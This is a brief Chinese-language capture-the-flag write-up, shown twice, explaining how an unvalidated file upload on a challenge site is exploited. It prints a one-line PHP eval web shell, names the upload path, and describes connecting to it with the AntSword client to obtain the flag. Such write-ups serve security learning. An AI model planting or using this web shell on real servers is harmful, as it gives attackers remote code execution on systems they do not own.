由题目可以知道,网站对于我们上传的任何文件都不做验证
可以确定思路:上传木马->获取靶机shell->在网站中寻找flag
我们先构造一个一句话木马:<?php @eval($_POST["pass"]);?> 保存为test.php上传至网站中
可以得到上传文件的相对路径:upload/test.php
然后通过中国蚁剑去连接木马即可得到flag
r1kka 2021-08-26 14:54 原文
由题目可以知道,网站对于我们上传的任何文件都不做验证
可以确定思路:上传木马->获取靶机shell->在网站中寻找flag
我们先构造一个一句话木马:<?php @eval($_POST["pass"]);?> 保存为test.php上传至网站中
可以得到上传文件的相对路径:upload/test.php
然后通过中国蚁剑去连接木马即可得到flag